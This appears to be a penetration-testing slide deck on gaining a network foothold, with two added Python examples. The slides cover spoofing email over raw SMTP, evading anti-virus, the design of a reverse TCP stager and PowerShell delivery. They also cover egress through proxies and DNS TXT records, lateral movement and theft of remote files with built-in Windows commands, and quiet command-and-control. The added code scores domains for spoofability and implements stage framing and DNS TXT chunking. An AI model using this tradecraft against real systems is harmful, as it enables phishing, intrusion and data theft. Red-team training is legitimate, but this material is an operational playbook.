TOOLS AND TRADECRAFT

Raphael Mudge
Principal, Strategic Cyber LLC
Developer, Cobalt Strike
Resident, Washington DC

How to get a Foothold (agenda)
• Message Delivery
• Code Execution
• Egress
• Stay Quiet

How to get a Foothold
1. Map the client-side attack surface
2. Create a virtual machine for testing purposes
3. Use the virtual machine to select the best attack
4. Configure and disguise the attack
5. Email the attack package to the victim

Message Delivery
• Defense (DKIM, SPF, and DMARC): identify spoofed messages
• Attacker: send email from an attacker-controlled domain, OR spoof a domain that publishes no validation information

Spoofing by hand (speak SMTP to the target's mail server directly):

    # telnet mail server 25
    HELO whatever.com
    MAIL FROM: <[email protected]>
    RCPT TO: <target email here>
    DATA
    message data
    .
    QUIT

Email Validation
• Sender Policy Framework (SPF)
  – dig +short TXT domain.com
• DomainKeys Identified Mail (DKIM)
• Domain-based Message Authentication, Reporting and Conformance (DMARC)
  – dig +short TXT _dmarc.domain.com
• Accepted Domains (MS Exchange feature)

Code Execution
• Defense (Anti-virus): check for known bad and stop it
• Attacker: get code into memory without anything known bad

Anti-virus
• False positives are bad
• Non-intrusive(?)
• Only checks a file at certain points
  – When loaded in the browser
  – When written to disk
• Checks for known signatures
• Applies heuristics to detect bad behavior
• Emulates the binary to defeat packers and crypters

Beating Anti-virus
1. Find out or guess which anti-virus is in use
2. Put that anti-virus on the test virtual machine
3. Select an undetected attack, or modify an existing attack until it is undetected

Stagers and Exploits
• Use an AV-safe stager EXE
  – Easy to write in a pinch
  – Tools exist to generate AV-safe stagers (e.g. Veil)
• Avoid an EXE if possible
  – exploit/windows/smb/psexec_psh
  – exploit/windows/misc/psh_web_delivery
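The message-delivery slides above come down to reading a target domain's SPF and DMARC records (the two dig commands) and deciding whether a message with that domain in the From: header will be accepted. The following Python is an added example, not code from the deck or from Cobalt Strike: it evaluates SPF and DMARC records offline and returns a rough spoofability verdict. The six domains and their records are constructed here; a real assessment would fetch them with dig or a DNS library and would still have to follow include: and redirect= terms, which this parser deliberately does not. The caveat the code encodes is the one that matters in practice: SPF only checks the envelope MAIL FROM, so an attacker can pass SPF with their own domain in MAIL FROM and still forge the From: header. Only an enforcing DMARC policy (p=quarantine or p=reject, at pct=100) ties the From: domain to an aligned SPF or DKIM pass.

```python
import re

# Constructed records for hypothetical domains (not real DNS data). In practice these are
# the answers to `dig +short TXT domain.com` and `dig +short TXT _dmarc.domain.com`.
RECORDS = {
    "enforced.example": ("v=spf1 include:_spf.example.net -all",
                         "v=DMARC1; p=reject; rua=mailto:dmarc@enforced.example"),
    "spf-only.example": ("v=spf1 ip4:192.0.2.0/24 ~all", None),
    "monitor.example":  ("v=spf1 mx -all", "v=DMARC1; p=none; rua=mailto:dmarc@monitor.example"),
    "rollout.example":  ("v=spf1 mx -all", "v=DMARC1; p=quarantine; pct=20"),
    "plusall.example":  ("v=spf1 +all", "v=DMARC1; p=reject"),
    "nothing.example":  (None, None),
}


def parse_spf(txt):
    """Return the qualifier of the SPF 'all' mechanism: '-' (fail), '~' (softfail),
    '?' (neutral) or '+' (pass). Returns '?' when there is no 'all' term (RFC 7208's
    default result is neutral), None when there is no SPF record, and None when the
    result depends on a redirect= target that this offline parser does not fetch."""
    if txt is None or not txt.lower().startswith("v=spf1"):
        return None
    terms = txt.split()[1:]
    for term in terms:
        m = re.fullmatch(r"([-~?+]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"
    if any(t.lower().startswith("redirect=") for t in terms):
        return None  # verdict lives in another record; include:/redirect= are not followed here
    return "?"


def parse_dmarc(txt):
    """Parse a DMARC record into a tag dict. Returns None unless the record is a valid
    v=DMARC1 record with the mandatory p= tag. pct defaults to 100 as the RFC specifies."""
    if txt is None:
        return None
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1" or "p" not in tags:
        return None
    tags.setdefault("pct", "100")
    return tags


def assess(spf_txt, dmarc_txt):
    """Spoofability of the header From: domain: 'spoofable', 'partial' or 'enforced'."""
    spf = parse_spf(spf_txt)
    dmarc = parse_dmarc(dmarc_txt)
    if dmarc is None or dmarc["p"].lower() == "none":
        # Nothing ties From: to SPF/DKIM. A forged From: sent with an attacker-owned
        # MAIL FROM domain passes SPF, and DMARC either does not exist or only reports.
        return "spoofable"
    if spf == "+":
        # '+all' gives every sending IP an aligned SPF pass, so DMARC passes as well.
        return "spoofable"
    if int(dmarc["pct"]) < 100:
        return "partial"  # policy applied to only a fraction of failing mail
    # Enforcing policy at 100%. With no SPF record (spf is None) this relies on DKIM.
    return "enforced"


RESULTS = {domain: assess(spf, dmarc) for domain, (spf, dmarc) in RECORDS.items()}

if __name__ == "__main__":
    for domain, verdict in RESULTS.items():
        print("%-20s %s" % (domain, verdict))
```

The verdicts map onto the slide's two attacker options: "spoofable" means the target's own domain can go in the From: header; anything else means sending from an attacker-controlled domain (which passes SPF and DMARC for that domain) is the safer delivery route.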
What a minimal reverse TCP stager does
1. Connect to the attacker
2. Read an integer containing the stage-2 length
3. Read [stage length] bytes
4. Allocate an RWX buffer
5. Move the connection (socket handle) into the EDI register
6. Copy the stage data into the RWX buffer
7. Pass control to the stage
See: https://github.com/rsmudge/metasploit-loader

Client-side Exploits
• Use an AV-safe client-side exploit
  – Custom Java Applet Attack
  – MS Office Macro
• Modify a Metasploit client-side exploit
  – Change strings in the module

Application Whitelisting
• Defense (Application Whitelisting): do not allow unapproved applications
• Attacker: get the agent into memory using a whitelisted application
• Use attacks that inject directly into memory
  – Custom Java Applet Attack
  – MS Office Macro
• Get into memory with PowerShell
  – exploit/windows/smb/psexec_psh
  – exploit/windows/misc/psh_web_delivery

Egress
• Defense (Firewall): limit which protocols may leave the network
• Attacker: communicate over an allowed protocol

Egress Controls
• Deny all outbound traffic
• Allow egress only through a proxy device
  – Attack traffic must conform to the expected protocol
  – Must pass other checks as well…

Staging
• Attacker limitation: staging!
• Stagers are size constrained; smaller is better
• If the payload can't stage, it can't execute
• If the protocol works for staging, C2 is OK
• Set EnableStageEncoding so the stage is encoded in transit rather than sent as a recognizable payload, which is what content checks on a proxy otherwise catch…

Proxies and Other Ways Out
• Metasploit Framework HTTP/HTTPS stagers
  – Transparent proxy? OK
  – Automatic NTLM auth to the proxy? OK
  – Static username and password on the proxy? Not OK
• Other ways out? DNS
  – ~184 bytes per DNS TXT record request
  – ~550 DNS TXT requests to move 100KB of data

Stay Quiet
• Defense (Network Security Monitoring): alert on attacker actions observed on the network
• Attacker:
  – Limit noisy activity
  – Use a low & slow C2 strategy

Don't Scan
• Do not scan hosts…
  – (ab)use Active Directory to discover hosts
• Use Windows commands to accomplish goals
  – Uploading and scheduling an executable via a command shell is safer than launching an exploit
• Use normal clients to interact with systems
  – Browser Pivot to interact with internal websites
  – RDP, SSH, etc.
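The seven stager steps and the DNS figures on the egress slide describe the same constraint from two sides: a stager is a small routine that pulls a length-prefixed stage over whatever channel gets out, and a channel is good enough for C2 if it can carry that stage. The following Python is an added example, not code from the deck or from the metasploit-loader project: it implements the handler/stager framing of steps 2 and 3 over a local socket pair, with the short-read and length checks a real loader needs, and then packs the same stage into DNS TXT strings at the slide's figure of 184 raw bytes per record. The stage is constructed filler rather than a real payload, 184 is taken from the slide, and steps 4 to 7 (RWX allocation, EDI, the jump) are described in comments but not performed.

```python
import base64
import socket
import struct
import threading

# Constructed stand-in for a real stage: 10 KB of filler bytes, not executable code.
STAGE = bytes(range(256)) * 40

RAW_PER_TXT = 184  # raw bytes carried per TXT record, the figure from the egress slide


def frame_stage(stage):
    """Handler side: 4-byte little-endian length, then the stage (what steps 2 and 3 read)."""
    return struct.pack("<I", len(stage)) + stage


def recv_exact(sock, n):
    """Read exactly n bytes. A short read is a failure, never a shorter stage."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)


def read_stage(sock, max_len=16 * 1024 * 1024):
    """Stager side, steps 2 and 3. A real stager would next allocate an RWX buffer, put the
    socket handle in EDI, copy the stage into the buffer and jump to it; here it is returned."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    if length == 0 or length > max_len:
        raise ValueError("implausible stage length %d" % length)
    return recv_exact(sock, length)


def stage_over_tcp(stage, truncate_at=None):
    """Run handler and stager on a local socket pair; truncate_at simulates a dropped link."""
    handler, stager = socket.socketpair()
    framed = frame_stage(stage)
    if truncate_at is not None:
        framed = framed[:truncate_at]

    def serve():
        handler.sendall(framed)
        handler.close()

    t = threading.Thread(target=serve)
    t.start()
    try:
        return read_stage(stager)
    finally:
        t.join()
        stager.close()


def stage_to_txt_records(stage, raw_per_record=RAW_PER_TXT):
    """Split the stage into base64 strings, one per TXT answer. 184 raw bytes encode to 248
    characters, inside the 255-byte limit of one TXT <character-string> with headroom to spare."""
    records = []
    for i in range(0, len(stage), raw_per_record):
        records.append(base64.b64encode(stage[i:i + raw_per_record]).decode("ascii"))
    return records


def txt_rdata(text):
    """Wire-format TXT RDATA for one string: a length byte followed by at most 255 bytes."""
    data = text.encode("ascii")
    if len(data) > 255:
        raise ValueError("TXT string longer than 255 bytes")
    return bytes([len(data)]) + data


def txt_records_to_stage(records):
    """Client side: reassemble the stage from the TXT answers, in query order."""
    return b"".join(base64.b64decode(r) for r in records)


def requests_needed(n_bytes, raw_per_record=RAW_PER_TXT):
    """Number of TXT requests to move n_bytes at raw_per_record bytes each (rounded up)."""
    return -(-n_bytes // raw_per_record)


if __name__ == "__main__":
    assert stage_over_tcp(STAGE) == STAGE
    records = stage_to_txt_records(STAGE)
    assert txt_records_to_stage(records) == STAGE
    print("TCP: staged %d bytes; DNS: %d TXT requests for this stage, %d for 100KB"
          % (len(STAGE), len(records), requests_needed(100 * 1024)))
```

Two details are worth noticing. First, `recv_exact` is what makes step 3 safe: a proxy that closes the connection mid-stage must produce a failure, not a truncated buffer that gets jumped into. Second, `requests_needed(100 * 1024)` reproduces the slide's "~550 requests for 100KB" arithmetic, which is the whole reason DNS is a last resort for staging and why a stage that fits in fewer records is worth the effort.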
Discovery with Built-in Commands

    How do I…                                  Do this…
    Find out which domain I trust              net view /DOMAIN
    See some hosts in the domain               net view /DOMAIN:[domain]
    See which hosts are DCs for a domain       nltest /dclist:[domain]
    Map a NetBIOS name to an IPv4 address      ping -n 1 -4 [name]

• Where am I an administrator?
  windows/gather/local_admin_search_enum (Metasploit post module)

Lateral Movement with Built-in Commands
• Copy a file to a host
  copy file.exe \\host\C$
• What time is it on the target host? (cmd.exe)
  net time \\host
• Schedule a task to run (cmd.exe)
  at \\host hh:mm c:\file.exe
  Note: at is deprecated. Use schtasks or wmic instead.

Remote Files
• Use a UNC path to reference files on another host
• List files in c:\foo on a remote host
  dir \\host\C$\foo
• Copy remote c:\foo\secrets.txt to the current host
  copy \\host\C$\foo\secrets.txt .
• Go shopping for files on a remote host
  dir /S \\host\C$ >files.txt

Low & Slow C2
• Use a slow asynchronous payload!
  – Sleep time of minutes to hours (with jitter)
  – Call home to multiple domains
• When you go interactive…
  – Spawn interactive sessions to another server (don't burn your primary C2 server)
  – Go interactive only when necessary (or at night)

Get a Foothold (recap)
• Message Delivery
• Code Execution
• Egress
• Stay Quiet

Tradecraft Course: http://www.advancedpentest.com/training
My Contact Information: raffi@strategiccyber.com
Correspondence in 140 chars: @armitagehacker